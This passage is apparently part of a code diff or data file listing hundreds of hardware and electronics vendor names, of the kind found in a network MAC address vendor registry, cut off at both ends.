lnformation Technology Limited", + "Equinox Payments", + "Hong Kong Telecommunications (HKT) Limited", + "Crenus Co.,Ltd.", + "KYOKKO ELECTRIC Co., Ltd.", + "R. STAHL HMI Systems GmbH", + "Nome Oy", + "NetView Technologies(Shenzhen) Co., Ltd", + "Validus Technologies", + "Jiangsu Datang Electronic Products Co., Ltd", + "Altronic, LLC", + "Absolute Analysis", + "Bryston Ltd.", + "Wush, Inc", + "Tokyo Radar Corporation", + "LG Display", + "Zeebo Inc", + "dSPACE GmbH", + "Energy Micro AS", + "SOLiD Technologies, Inc.", + "GECO, Inc.", + "Whirlpool Corporation", + "Quadrant Components Inc. Ltd", + "Rim", + "HealthStream Taiwan Inc.", + "Lorent Networks, Inc.", + "IBT Interfaces", + "Skyviia Corporation", + "Wuhan Lingjiu High-tech Co.,Ltd.", + "Red Sun Synthesis Pte Ltd", + "Global411 Internet Services, LLC", + "KWB Gmbh", + "EMC Electronic Media Communication SA", + "Xenya d.o.o.", + "Shenzhen Wonhe Technology Co., Ltd", + "Nrg Systems Inc", + "SYSGRATION Ltd.", + "Alphatronics BV", + "Beoview Intercom Doo", + "Winstars Technology Ltd", + "Digistar Telecom. SA", + "Z.U.K. Elzab S.A.", + "Kuipers Electronic Engineering BV", + "Nebula, Inc", + "Ubivelox", + "Mettle Networks Inc.", + "SCI Innovations Ltd", + "Unidis", + "Micro S.e.r.i.", + "Skymotion Technology (HK) Limited", + "China Hopeful Group Hopeful Electric Co.,Ltd", + "Silverbrook Research", + "Scientific Production Association Siberian Arsenal, Ltd.", + "AK-Systems Ltd", + "KVH Industries, Inc.", + "Y&H E&C Co.,LTD.", + "Jri", + "Pico Systems Co., Ltd.", + "Institute 706, The Second Academy China Aerospace Science & Industry Corp", + "Zhuhai Tianrui Electrical Power Tech. Co., Ltd.", + "Gardasoft VisionLimited", + "ADS GmbH", + "iota Computing, Inc.", + "Pakton Technologies", + "HCT. Co., Ltd.", + "VECOW Co., Ltd", + "Fundacion Tekniker", + "The Warehouse Limited", + "Kontron Asia Pacific Design Sdn. Bhd", + "Sabre Technology (Hull) Ltd", + "Chrontel", + "Parker Hannifin Manufacturing (UK) Ltd", + "Palomar Medical Technologies", + "Nanotek Elektronik Sistemler Ltd. Sti.", + "Hangzhou Lancable Technology Co.,Ltd", + "Technosoft International Srl", + "Embedded Wireless Labs", + "FUSION Electronics Ltd", + "Digital Devices GmbH", + "Tri-Tech Manufacturing, Inc.", + "Hunting Innova", + "VIGO System S.A.", + "Polostar Technology Corporation", + "Cloud Telecomputers, LLC", + "NOVA electronics, Inc.", + "Silvershore Technology Partners", + "Fujian Shenzhou Electronic Co.,Ltd", + "SLE quality engineering GmbH & Co. KG", + "Dhemax Ingenieros Ltda", + "Shenzhen Maxmade Technology Co., Ltd.", + "Joa Telecom.co.,Ltd", + "Telepower Communication Co., Ltd", + "A&T", + "Verizon Telematics", + "Takahata Precision", + "Intrepid Control Systems, Inc.", + "Xstream Flow (Pty) Ltd", + "Logital Co. Limited", + "Ticom Geomatics, Inc.", + "Sunrex Technology Corp", + "Hermes electronic GmbH", + "azeti Networks AG", + "Beijing Ding Qing Technology, Ltd.", + "Solidica, Inc.", + "Beijing JoinHope Image Technology Ltd.", + "Lorom Industrial Co.LTD.", + "CJSC RTSoft", + "STT Condigi", + "Zhejiang Pearmain Electronics Co.ltd.", + "Industrial Control Communications, Inc.", + "Beijing KEMACOM Technologies Co., Ltd.", + "Irz Automation Technologies Ltd", + "Limited Liability Company", + "NEW Lift Neue Elektronische Wege Steuerungsbau GmbH", + "OT Systems Limited", + "IMS Soluções em Energia Ltda.", + "EAGET Innovation and Technology Co., Ltd.", + "TechVision Holding Internation Limited", + "Shenzhen Afoundry Electronic Co., Ltd", + "EControls, LLC", + "Sungrow Power Supply Co.,Ltd.", + "Portsmith LLC", + "Utillink", + "Fylde Micro Ltd", + "Joview(Beijing) Technology Co. Ltd.", + "2C - Trifonov & Co", + "Mako Networks Ltd", + "Weg", + "Chongqing Guohong Technology Development Company Limited", + "MRV Communications (Networks) LTD", + "Shenzhen Prayfly Technology Co.,Ltd", + "Unicore communication Inc.", + "Unipattern Co.,", + "ROPEX Industrie-Elektronik GmbH", + "He Shan World Fair Electronics Technology Limited", + "Beijing Beny Wave Technology Co Ltd", + "Chaney Instrument Co.", + "Xi3 Corp", + "Xtremio Ltd.", + "H-Displays (MSC) Bhd", + "CELIZION Inc.", + "Paradom Inc.", + "Genius Bytes Software Solutions GmbH", + "SPI Lasers Ltd", + "Galvanic Applied Sciences Inc", + "Dipl.-Math. Michael Rauch", + "Chi Mei Communication Systems, Inc", + "Mst Corporation", + "ARCHEAN Technologies", + "Beamex Oy Ab", + "Fibrlink Communications Co.,Ltd.", + "Hytera Communications Co .,ltd", + "Petatel Inc.", + "Sabtech Industries", + "Sunrise Technologies", + "Mianyang Netop Telecom Equipment Co.,Ltd.", + "Enigma Diagnostics Limited", + "Bonfiglioli Vectron GmbH", + "Fastec Imaging Corporation", + "BeNeXt B.V.", + "Silicon & Software Systems Ltd.", + "Hongkong Miracle Eagle Technology(Group) Limited", + "Fireflies Systems", + "Shenzhen VisionSTOR Technologies Co., Ltd", + "Control Sistematizado S.A.", + "Amped Wireless", + "Squarehead Technology AS", + "Kemper Digital GmbH", + "Jebsee Electronics Co.,Ltd.", + "Payter BV", + "Cpi", + "ADV Security (S) Pte Ltd", + "Broadband Antenna Tracking Systems", + "Acroname Inc.", + "Static Systems Group PLC", + "Velodyne", + "ZPM Industria e Comercio Ltda", + "Kingnetic Pte Ltd", + "Jiwumedia Co., Ltd.", + "Starlight Marketing (H. K.) Ltd.", + "Precidata", + "Eurecam", + "Environics Oy", + "VXL eTech Pvt Ltd", + "PacketStorm Communications", + "DIGALOG GmbH", + "HARTING Inc. of North America", + "d&b audiotechnik GmbH", + "Juin Company, Limited", + "Atopia Systems, LP", + "Nastec Ltd.", + "Novamedia Innovision Sp. Z O.o.", + "Hrd (S) Pte., Ltd.", + "Vuppalamritha Magnetic Components LTD", + "AgileMesh, Inc.", + "Sumitomo Electric Industries, Ltd", + "RW Tecnologia Industria e Comercio Ltda", + "Carefusion", + "Digital Payment Technologies", + "Soliton Technologies Pvt Ltd", + "Hirschmann Automation", + "SECUDOS GmbH", + "MindTree Wireless PVT Ltd", + "Modoosis Inc.", + "Shenzhen Xdk Communication Equipment Co.,Ltd", + "MA Lighting Technology GmbH", + "Eid", + "MicroPower technologies", + "Advanced PANMOBIL Systems GmbH & Co. KG", + "Ip-Net Llc", + "ZBD Displays Ltd", + "Anobit Technologies Ltd.", + "Thomson Telecom Belgium", + "Comtec Co., Ltd.", + "TSST Global,Inc", + "Radicom Research, Inc.", + "IdaTech", + "ASD Electronics Ltd", + "ECOtality North America", + "100fio networks technology llc", + "Primax Electronics Ltd.", + "Suzhou Hanming Technologies Co., Ltd.", + "General Electric Digital Energy", + "Titan Pet Products", + "CMAX Wireless Co., Ltd.", + "Infinite Technologies JLT", + "PhaseSpace", + "Cobham plc", + "CSM GmbH", + "Taco Inc", + "Gemintek Corporation", + "II-VI Incorporated", + "Electroacustica General Iberica, S.A.", + "camtron industrial inc.", + "Nihon Dengyo Kousaku", + "EutroVision System, Inc.", + "RENA GmbH Print Systeme", + "Ssoma Security", + "Nadasnv", + "Linked IP GmbH", + "Sigma Koki Co.,Ltd.", + "Tamron Co., Ltd", + "Nuvolt", + "Nanjing Z-Com Wireless Co.,Ltd", + "Forward Pay Systems, Inc.", + "Velocytech", + "Sound4", + "OTSL Inc.", + "PT. Panggung Electric Citrabuana", + "B&W Group LTD", + "Yu Jeong System, Co.Ltd", + "Storage Appliance Corporation", + "Braemac CA LLC", + "RBH Access Technologies Inc.", + "Orbis Tecnologia Electrica S.a.", + "Cynove", + "Embedian, Inc.", + "Generiton Co., Ltd.", + "Justone Technologies Co., Ltd.", + "Wireless Technology, Inc.", + "Huayuan Technology CO.,LTD", + "Beijing Newmine Technology", + "Grupo Digicon", + "Emicon", + "NEON Inc", + "Intune Networks", + "Next Generation Integration Limited (Ngi)", + "Carrier Fire & Security", + "Bee Beans Technologies, Inc.", + "Orbisat Da Amazonia Ind E Aerol Sa", + "Wildix srl", + "SamJi Electronics Co., Ltd", + "Axema Passagekontroll AB", + "Cyber Trans Japan Co.,Ltd.", + "Simm Tronic Limited", + "Bison Electronics Inc.", + "Elettronica Santerno SpA", + "Omnibit Inc.", + "Zelfy Inc", + "SunReports, Inc.", + "WizLAN Ltd.", + "Supercomputers and Neurocomputers Research Center", + "Viettel Group", + "Cross Point BV", + "S I Sistemas Inteligentes Eletrônicos Ltda", + "Acuro Networks, Inc", + "Luxcom Technologies Inc.", + "PURE Storage", + "iFORCOM Co., Ltd", + "Arcx Inc", + "Clavister AB", + "Novar GmbH", + "Degreane Horizon", + "Se-Kure Controls, Inc.", + "Leroy Automation", + "DAEYEON Control&Instrument Co,.Ltd", + "GFI Chrono Time", + "Tubitak Uekae", + "Ericsson, EAB/RWI/K", + "Resolution Audio", + "H2A Systems, LLC", + "Gembird Europe BV", + "Integrated Corporation", + "Vitec Group, Camera Dynamics Ltd", + "Intrigue Technologies, Inc.", + "Soundmax Electronic Limited", + "Dobbs Stanford", + "Phytec Messtechnik GmbH", + "Arantia 2010 S.L.", + "Goodrich ISR", + "Control Technology Inc.", + "Alge-Timing GmbH", + "Proware Technologies Co Ltd.", + "Direct Payment Solutions Limited", + "InnoDigital Co., Ltd.", + "Display Systems Ltd", + "Pakedge Device and Software Inc.", + "TeleAdapt Ltd", + "Movek", + "PrintCounts, LLC", + "Wattwatchers Pty Ld", + "OnTime Networks AS", + "IPROAD.,Inc", + "Optcom Co., Ltd.", + "Shenzhen Yidashi Electronics Co Ltd", + "Fugoo Coorporation", + "AnB Securite s.a.", + "Ubiquitous Internet Telecom Co., Ltd", + "Heinz Lackmann GmbH & Co KG", + "Wohler Technologies", + "Precor Inc", + "Elmo Motion Control", + "Chitai Electronic Corp.", + "Acetel", + "Uzushio Electric Co.,Ltd.", + "Midnite Solar", + "Shenzhen Magnus Technologies Co.,Ltd", + "David Clark Company", + "Gradual Tecnologia Ltda.", + "MadgeTech, Inc", + "Shanghai Meridian Technologies, Co. Ltd.", + "Catch The Wind Inc", + "EdgeCore Networks", + "Bt&Com Co.,Ltd", + "PowerLayer Microsystems HongKong Limited", + "Aryaka Networks Inc", + "PRF Co., Ltd.", + "Ragsdale Technology", + "Hanyang Navicom Co.,Ltd.", + "ALT Systems Ltd", + "PicoCELA, Inc.", + "Prentke Romich Company", + "MiraeRecognition Co., Ltd.", + "Toshiba Mitsubishi-Electric Industrial Systems Corporation", + "Venetex Corp", + "Aplicom Oy", + "JTECH Communications, Inc.", + "Sypro Optics GmbH", + "Kenade Electronics Technology Co.,LTD.", + "ShotSpotter, Inc.", + "Halfa Enterprise Co., Ltd.", + "Z'sedai Kenkyusho Corporation", + "Shanghai EDO Technologies Co.,Ltd.", + "Quatius Limited", + "Shenzhen State Micro Technology Co., Ltd", + "Gana I&C Co., Ltd", + "DASCOM Europe GmbH", + "Jetlun (Shenzhen) Corporation", + "CombiQ AB", + "BK Electronics cc", + "ELIMOS srl", + "ABB Ltd", + "Deep Sea Electronics Ltd", + "Acentic GmbH", + "United Integrated Services Co., Led.", + "OpenVox Communication Co Ltd", + "MIPRO Electronics Co., Ltd", + "Qpcom Inc.", + "Strong Technologies Pty Ltd", + "Microrobot.co.,Ltd", + "FQ Ingenieria Electronica S.A.", + "M2Mnet Co., Ltd.", + "Guangdong Gosun Telecommunications Co.,Ltd", + "Cadmos microsystems S.r.l.", + "System Sensor", + "SCDI Co. LTD", + "Alpha Technologies Inc.", + "Terrier SC Ltd", + "MaxVision LLC", + "Deka R&D", + "Shanghai ONLAN Communication Tech. Co., Ltd.", + "Asiteq", + "Testech Electronics Pte Ltd", + "Space Exploration Technologies", + "Rosemount Inc.", + "OBR Centrum Techniki Morskiej S.A.", + "TEAC Australia Pty Ltd.", + "General Dynamics Robotic Systems", + "Digital Innovation", + "JRD Communication Inc", + "Truesell", + "wuhan hongxin telecommunication technologies co.,ltd", + "Core System Japan", + "r2p GmbH", + "Krüger &Gothe GmbH", + "InteliCloud Technology Inc.", + "Neovia Inc.", + "T.M. Electronics, Inc.", + "AAMP of America", + "i-mate Development, Inc.", + "Belgian Monitoring Systems bvba", + "CeedTec Sdn Bhd", + "Probits Co., LTD.", + "Schmartz Inc", + "Manufacturing Resources International", + "I-Tech corporation", + "Aio Lcd Pc Bu / Tpv", + "Alcatel-Lucent IPD", + "INNERINT Co., Ltd.", + "Maya-Creation Corporation", + "Agile Communications, Inc.", + "InnerSpace", + "kasercorp, ltd", + "Star Link Communication Pvt. Ltd.", + "altek Corporation", + "CreNova Multimedia Co., Ltd", + "Nordwestdeutsche Zählerrevision", + "Humanware", + "NuVo Technologies LLC", + "Enalasys", + "CEStronics GmbH", + "NEXTEK, Inc.", + "Haier", + "Sunnytek Information Co., Ltd.", + "Runcom Technologies Ltd.", + "Samsung Electronics Co., Ltd., Memory Division", + "LoJack Corporation", + "RingCube Technologies, Inc.", + "ELETTROLAB Srl", + "Jeorich Tech. Co.,Ltd.", + "IfTA GmbH", + "Edt", + "Psiber Data Systems Inc.", + "PC Worth Int'l Co., Ltd.", + "Digital Recorders", + "Zhejiang Tianle Digital Electric Co.,Ltd", + "Morningstar Corporation", + "Mpedia", + "Technical Solutions Company Ltd.", + "Uniphone Telecommunication Co., Ltd.", + "ASTAK Inc.", + "NaturalPoint", + "Centrofactor Inc", + "A.i. Antitaccheggio Italia Srl", + "Esab Ab", + "Convey Computer Corp.", + "BICOM, Inc.", + "Wynmax Inc.", + "CAO Group", + "Fasttel - Smart Doorphones", + "Bridge Technologies Co AS", + "Rayzone Corporation", + "Shenzhen Baoxin Tech CO., Ltd.", + "Vodafone Omnitel N.V.", + "Compass System(Embedded Dept.)", + "Onda Communication spa", + "NetUP Inc.", + "DCT-Delta GmbH", + "Giaval Science Development Co. Ltd.", + "Design-Com Technologies Pty. Ltd.", + "Emerson Appliance Motors and Controls", + "Motorola - BSG", + "NES Technology Inc.", + "Infoware ZRt.", + "Asantron Technologies Ltd.", + "AFT Atlas Fahrzeugtechnik GmbH", + "Microtronic AG", + "Elgin S.a.", + "Ansync Inc.", + "Banner Engineering", + "Industrial Computer Source (Deutschland)GmbH", + "Inventec Besta Co., Ltd.", + "Dilog Nordic AB", + "Zuend Systemtechnik AG", + "Demco Corp.", + "Q-Light Co., Ltd.", + "Ball-It Oy", + "Danaher Motion - Kollmorgen", + "Cezzer Multimedia Technologies", + "Guangda Electronic & Telecommunication Technology Development Co., Ltd.", + "ABK North America, LLC", + "Qool Technologies Ltd.", + "LNC Technology Co., Ltd.", + "Gulfstream", + "Benchmark Electronics ( Thailand ) Public Company Limited", + "Pitronot Technologies and Engineering P.T.E. Ltd.", + "Kinco Automation(Shanghai) Ltd.", + "GridIron Systems, Inc.", + "UniControls a.s.", + "Burster GmbH & Co KG", + "Beijing Siasun Electronic System Co.,Ltd.", + "Institut für Prüftechnik", + "Mapower Electronics Co., Ltd", + "Vutlan sro", + "Nidec Copal Corporation", + "Nanoteq", + "Purechoice Inc", + "IONODES Inc.", + "Sutus Inc", + "Shenzhen Forcelink Electronic Co, Ltd", + "LinoWave Corporation", + "Ared Technology Co., Ltd.", + "SciLog, Inc.", + "Data Respons A/S", + "iWDL Technologies", + "SunPower Corp", + "Applition Co., Ltd.", + "ProVision Communications", + "Shenzhen Tongfang Multimedia Technology Co.,Ltd.", + "Telecom Design", + "Tyco Electronics AMP GmbH", + "Huawei Symantec Technologies Co.,Ltd.", + "Pyung-Hwa Ind.co.,Ltd", + "Clover Electronics Co.,Ltd.", + "Witron Technology Limited", + "Conceptronic", + "Intelligent Data", + "Amerigon", + "WABTEC Transit Division", + "Sony Computer Entertainment America", + "Mitac Technology Corp", + "uv-electronic GmbH", + "Thales Avionics Ltd", + "Media Devices Co., Ltd.", + "Shinhint Group", + "Open Grid Computing, Inc.", + "Chengdu Linkon Communications Device Co., Ltd", + "Point Six Wireless, LLC", + "3onedata Technology Co. Ltd.", + "AFREEY Inc.", + "Oracle Corporation", + "Cyberdyne Inc.", + "Excito Elektronik i Skåne AB", + "Indigo Security Co., Ltd.", + "IRTrans GmbH", + "NTC-Metrotek", + "ART System Co., Ltd.", + "Sms Tecnologia Eletronica Ltda", + "LOHUIS Networks", + "Hitachi High-Tech Control Systems Corporation", + "Kapsys", + "Telegesis", + "Esp Systems, Llc", + "Satel Oy", + "Telsey S.p.A.", + "AP Router Ind. Eletronica LTDA", + "Goliath Solutions", + "AvaLAN Wireless", + "IOGEAR, Inc.", + "Santachi Video Technology (Shenzhen) Co., Ltd.", + "Martin Christ GmbH", + "Vollmer Werke GmbH", + "LXI Consortium", + "Telephonics Corporation", + "Mobilink Telecom Co.,Ltd", + "Videotec Spa", + "Zala Computer", + "Apro Media Co., Ltd", + "SandLinks Systems, Ltd.", + "ANDRITZ HYDRO GmbH", + "iVeia, LLC", + "Escherlogic Inc.", + "SemIndia System Private Limited", + "MSA Auer", + "Berkshire Products, Inc", + "Bay Controls, LLC", + "National Datacast, Inc.", + "Cymtec Systems, Inc.", + "Gemini Traze Rfid Pvt. Ltd.", + "Gigaset Communications GmbH", + "Green Packet Bhd", + "Audiovox Corporation", + "Guangzhou Skytone Transmission Technology Com. Ltd.", + "Eyeview Electronics", + "Audio Partnership", + "Applied Media Technologies Corporation", + "Clearbox Systems", + "Cache IQ", + "Apriva ISS, LLC", + "Skydigital Inc.", + "FMS Force Measuring Systems AG", + "digEcor", + "Lucas Holding bv", + "Blue-White Industries", + "Gtran Inc", + "Printrex, Inc.", + "Gdi Llc", + "Qtech Llc", + "ACE CAD Enterprise Co., Ltd.", + "Lodam Electronics A/S", + "xG Technology, Inc.", + "RSD Communications Ltd", + "TimeIPS, Inc.", + "Blick South Africa (Pty) Ltd", + "SERONICS co.ltd", + "Aprotech Co.ltd", + "Fujian Sunnada Communication Co.,Ltd.", + "Compass Systems Corp.", + "PacketFlux Technologies, Inc.", + "Korea Electric Terminal Co., Ltd.", + "Dyna Technology Co.,Ltd.", + "Mytek", + "ETL Systems Ltd", + "Urmet SpA", + "Wesemann Elektrotechniek B.V.", + "IDX Company, Ltd.", + "Honeywell Security (China) Co., Ltd.", + "Lorex Technology Inc.", + "Lineage Power", + "Speakercraft Inc.", + "Jsc Massa-K", + "Integrated Dispatch Solutions", + "PROTEI Ltd.", + "Trio Motion Technology Ltd", + "Emfinity Inc.", + "RoyalTek Company Ltd.", + "L3 Communications - Telemetry West", + "Triangle Research Int'l Pte Ltd", + "RPC Energoautomatika Ltd", + "High Density Devices AS", + "Visioneering Systems, Inc.", + "San-Eisha, Ltd.", + "H-Stream Wireless, Inc.", + "Tekon-Automatics", + "Unifat Technology Ltd.", + "Datang Mobile Communications Equipment CO.,LTD", + "TeleWell Oy", + "ITEC GmbH", + "Silicon Turnkey Express, LLC", + "MIrcom Group of Companies", + "Chelton Limited", + "Converter Industry Srl", + "PT. Hariff Daya Tunggal Engineering", + "Wi-Links", + "eCopy, Inc", + "Digital Stream Technology, Inc.", + "Stn Bv", + "Radio Activity srl", + "Beech Hill Electronics", + "AIOI Systems Co., Ltd.", + "Enphase Energy", + "Versamed Inc.", + "Webpro Vision Technology Corporation", + "Cybiotronics (Far East) Limited", + "R. STAHL Schaltgeräte GmbH", + "Xseed Technologies & Computing", + "Winy Technology Co., Ltd.", + "Syba Tech Limited", + "LiComm Co., Ltd.", + "Bluecard Software Technology Co., Ltd.", + "Shireen Inc", + "SIRTI S.p.A.", + "DINEC International", + "HangZhou DeChangLong Tech&Info Co.,Ltd", + "KMW Inc.", + "Tendril Networks, Inc.", + "Artjoy International Limited", + "Axion Technologies", + "Godex International Co., Ltd", + "Alertus Technologies LLC", + "Shenzhen G-link Digital Technology Co., Ltd.", + "Mitron Pty Ltd", + "Moohadigital Co., Ltd", + "Thales-Panda Transportation System", + "YX Wireless S.A.", + "Tekron International Ltd", + "Signamax Llc", + "Chainzone Technology Co., Ltd", + "Invengo Information Technology Co.,Ltd", + "InPhase Technologies", + "Miele & Cie. KG", + "Chang Tseng Technology Co., Ltd", + "Media Numerics Limited", + "Digitize, Inc", + "Flash, Inc.", + "Fluke Process Instruments GmbH", + "NextGTV", + "LightHaus Logic, Inc.", + "Speradtone Information Technology Limited", + "MusicianLink", + "Bpt Spa", + "Neihua Network Technology Co.,LTD.(NHN)", + "Iridium Satellite LLC", + "Duzon CNT Co., Ltd.", + "Siauliu Tauro Televizoriai, JSC", + "Alektrona Corporation", + "Rembrandt Technologies, LLC d/b/a REMSTREAM", + "Zipit Wireless, Inc.", + "Circleone Co.,Ltd.", + "Razorstream, LLC", + "Mobilesoft (Aust.) Pty Ltd", + "Cummins Inc", + "Tenlon Technology Co.,Ltd.", + "Quest Retail Technology Pty Ltd", + "ThyssenKrupp Elevator", + "secunet Security Networks AG", + "Hangzhou Hollysys Automation Co., Ltd", + "Zoltan Technology Inc.", + "International Police Technologies, Inc.", + "AmRoad Technology Inc.", + "Telian Corporation", + "Truen", + "Integrated Medical Systems, Inc.", + "Visionee Srl", + "Mesa Imaging", + "Force Communications, Inc.", + "Uriver Inc.", + "Excelpoint Manufacturing Pte Ltd", + "Prodys", + "Emfit Ltd", + "30805", + "Galaxy Microsystems LImited", + "Sphairon Technologies GmbH", + "SAE Electronic Co.,Ltd.", + "TANITA Corporation", + "Hose-McCann Communications", + "SATEL sp. z o.o.", + "l-acoustics", + "Hulu Sweden AB", + "Ultratronik GmbH", + "ViaLogy", + "Iskra Sistemi d.d.", + "Netio Technologies Co., Ltd", + "Airvod Limited", + "Bird Electronic Corp.", + "intotech inc.", + "2M Electronic A/S", + "LORD Corporation", + "Ripcode, Inc.", + "IRI Ubiteq, INC.", + "StarVedia Technology Inc.", + "S.A.E Afikim", + "JC Decaux SA DNT", + "Edgewater Wireless Systems Inc", + "Mendocino Software", + "Danfoss Drives A/S", + "Applied Radio Technologies", + "ED Co.Ltd", + "ModusLink Corporation", + "LookX Digital Media BV", + "Swyx Solutions AG", + "Equaline Corporation", + "Modnnet Co., Ltd", + "JHT Optoelectronics Co.,Ltd.", + "General Infinity Co.,Ltd.", + "Curtis, Inc.", + "Computec Oy", + "ShenZhen Kang Hui Technology Co.,ltd", + "Phidgets Inc.", + "SimpleComTools", + "Tsuken Electric Ind. Co.,Ltd", + "Woven Systems, Inc.", + "AeroVIronment (AV Inc)", + "Mythology Tech Express Inc.", + "Nizhny Novgorod Factory named after M.Frunze, FSUE (NZiF)", + "Solitech Inc.", + "Futarque A/S", + "ABB AS, Division Automation Products", + "Computer Hi-Tech Inc.", + "Fontal Technology Incorporation", + "Impatica Inc.", + "Savant Systems LLC", + "CCV Deutschland GmbH - Celectronic eHealth Div.", + "Thincom Technology Co.,Ltd", + "Canhold International Limited", + "Venergy,Co,Ltd", + "Procare International Co", + "FFEI Ltd.", + "Home Network System", + "Telecomunication Technologies Ltd.", + "Analogic Corp.", + "Chunil Electric Ind., Co.", + "AVECS Bergen GmbH", + "Hisense Mobile Communications Technoligy Co.,Ltd.", + "Zelax", + "Christie Digital Systems, Inc.", + "Tidel Engineering LP", + "Aztek Networks, Inc.", + "Suzuken Co.,Ltd", + "Future University-Hakodate", + "A-Link Ltd", + "Galaxy Telecom Technologies Ltd", + "CMOTECH Co. Ltd.", + "Computer Engineering Limited", + "Advanced Simulation Technology inc.", + "Euchner GmbH+Co. KG", + "NetCare Service Co., Ltd.", + "NTI AG / LinMot", + "Meshlinx Wireless Inc.", + "Wanlida Group Co., LTD", + "Arteche Group", + "Logical Link Communications", + "Agami Systems, Inc.", + "Angel Electronics Co., Ltd.", + "TDK-Lambda", + "Teradyne K.K.", + "The Navvo Group", + "Ocean Optics, Inc.", + "IT Watchdogs, Inc", + "Cheng Hongjian", + "Hopling Technologies b.v.", + "Rigol Technologies, Inc.", + "Itu-T", + "Mobitek", + "Lynx Studio Technology, Inc.", + "Micro-Star International Co., Ltd.", + "Nifty", + "MikroM GmbH", + "Progressive Gaming International", + "New Media Life", + "Danpex Corporation", + "Dkt A/S", + "PowerQuattro Co.", + "EO TECHNICS Co., Ltd.", + "Altec Electronic AG", + "Shenzhen Streaming Video Technology Company Limited", + "VVOND, Inc.", + "LigoWave", + "Duerr Dental Ag", + "Gude Systems GmbH", + "Balluff GmbH", + "Winix Co., Ltd", + "F1media", + "GMC Guardian Mobility Corp.", + "Knick Elektronische Messgeraete GmbH & Co. KG", + "Chuang-Yi Network Equipment Co.Ltd.", + "NETCONS, s.r.o.", + "Yushin Precision Equipment Co.,Ltd.", + "Alltec GmbH", + "Hacetron Corporation", + "Saafnet Canada Inc.", + "Bluetooth SIG, Inc.", + "Visualgate Systems, Inc.", + "ShenZhen jieshun Science&Technology Industry CO,LTD.", + "Lenntek Corporation", + "D3 Led, Llc", + "Almitec Informática e Comércio", + "Raba Technologies LLC", + "EOps Technology Limited", + "ZAO NVP Bolid", + "Taiguen Technology (Shen-Zhen) Co., Ltd.", + "Nexterm Inc.", + "Zhenjiang Sapphire Electronic Industry CO.", + "Setha Industria Eletronica LTDA", + "AnaCise Testnology Pte Ltd", + "ARCH METER Corporation", + "Santosha Internatonal, Inc", + "Baldor Electric Company", + "Ekahau, Inc.", + "Formosa21 Inc.", + "Hansun Technologies Inc.", + "Catcher, Inc.", + "Las Vegas Gaming, Inc.", + "Syrinx Industrial Electronics", + "Touchtunes Music Corporation", + "CM Precision Technology LTD.", + "SK Telesys", + "ACIST Medical Systems, Inc.", + "DACOS Technologies Co., Ltd.", + "Thinlinx Pty Ltd", + "MARA Systems Consulting AB", + "Mitutoyo Corporation", + "D. E. Shaw Research, LLC", + "Neuros Technology International, LLC.", + "Advantage Six Ltd", + "ION Geophysical Corporation Inc.", + "Universal ABIT Co., Ltd.", + "Cec Telecom Co.,Ltd.", + "w5networks", + "Novatron Co., Ltd.", + "e2v technologies (UK) ltd.", + "Thoratec / ITC", + "Avega Systems", + "Harris Corporation", + "GSI Group, MicroE Systems", + "GE Security", + "Online Corporation", + "MIX s.r.l.", + "Yosin Electronics Co., Ltd.", + "DEPRAG SCHULZ GMBH u. CO.", + "Rittmeyer AG", + "TTE Germany GmbH", + "Meso Scale Diagnostics, LLC", + "QuickTel", + "Earforce AS", + "Smartlink Network Systems Limited", + "Greystone Data System, Inc.", + "Sparr Electronics Ltd", + "Taejin Infotech", + "Millipore", + "INNOTZ CO., Ltd", + "Neokoros Brasil Ltda", + "Checkpoint Systems, Inc.", + "Gunnebo Cash Automation AB", + "Essentia S.p.A.", + "Dongseo system.", + "Bright Headphone Electronics Company", + "Digit", + "Vansco Electronics Oy", + "Audiocodes USA, Inc", + "Wamin Optocomm Mfg Corp", + "KDE, Inc.", + "Methode Electronics", + "Futronic Technology Co. Ltd.", + "Compal Communications, Inc.", + "Sunways AG", + "ZAT a.s.", + "Cytiva Sweden AB", + "Leica Geosystems AG", + "Qstik", + "Shenzhen Xing Feng Industry Co.,Ltd", + "Xcute Mobile Corp.", + "Royaldigital Inc.", + "Utility, Inc", + "FAST Inc", + "Zenway enterprise ltd", + "Symphox Information Co.", + "MRV Communication (Networks) LTD", + "Eishin Electronics", + "FUHO TECHNOLOGY Co., LTD", + "SSD Company Limited", + "Kei Communication Technology Inc.", + "Cwt Co., Ltd.", + "Dovado FZ-LLC", + "CentraLite Systems, Inc.", + "Sky-Line Information Co., Ltd.", + "Bihl + Wiedemann GmbH", + "Harman Specialty Group", + "Z.m.p. Radwag", + "AVC Technology (International) Limited", + "Clivet S.p.A.", + "Interlink Electronics", + "Xantech Corporation", + "Emitor AB", + "OSLiNK Sp. z o.o.", + "Nicevt", + "KYLINK Communications Corp.", + "Tellumat (Pty) Ltd", + "Dr.Ing. Herbert Knauer GmbH", + "Picochip Ltd", + "Lpl Development S.a. De C.v", + "Otsuka Electronics Co., Ltd.", + "TVWorks LLC", + "COOLKSKY Co., LTD", + "Unitech electronics co., ltd.", + "Asmobile Communication Inc.", + "Rebox B.V.", + "Lancelan Technologies S.L.", + "Innovative Wireless Technologies, Inc.", + "Altecon Srl", + "Impinj, Inc.", + "Interval Media", + "Sustainable Energy Systems", + "Park Air Systems Ltd", + "Xiamen Overseas Chinese Electronic Co., Ltd.", + "Weidmüller Interface GmbH & Co. KG", + "U-Way Corporation", + "Dave Networks, Inc.", + "ChuanG International Holding CO.,LTD.", + "Nadam.co.,Ltd", + "Ventus Networks", + "A Beltrónica-Companhia de Comunicações, Lda", + "Tripp Lite", + "Facom UK Ltd (Melksham)", + "Dresser Wayne", + "Securaplane Technologies, Inc.", + "Olivetti", + "Atalum Wireless S.A.", + "Caretech AB", + "Rextechnik International Co.,", + "Alcatel Alenia Space Italia", + "LABiTec - Labor Biomedical Technologies GmbH", + "Iqua Ltd.", + "Morgan Stanley", + "BETA tech", + "Thecus Technology Corp.", + "Extandon, Inc.", + "Scientific Atlanta", + "CREVIS Co., LTD", + "mingjong", + "Sage Infotech Ltd.", + "Renaissance Learning Inc", + "Global Target Enterprise Inc", + "Alticast", + "LET'S Corporation", + "datacom systems inc.", + "infinias, LLC", + "Shenzhen 10MOONS Technology Development CO.,Ltd", + "Leipold+Co.GmbH", + "Remote Technologies Inc", + "S Digm Inc. (Safe Paradigm Inc.)", + "LifeSync Corporation", + "Quixant Ltd", + "Elma Trenew Electronic GmbH", + "Zetec, Inc.", + "K40 Electronics", + "Kohler Co", + "Kleinhenz Elektronik GmbH", + "Anagran, Inc.", + "System and Chips, Inc.", + "Viking Design Technology", + "Phonic Corp.", + "Systimax Solutions", + "Aevoe Inc.", + "Raytalk International Srl", + "Corona Corporation", + "Digiwell Technology, inc", + "Idcs 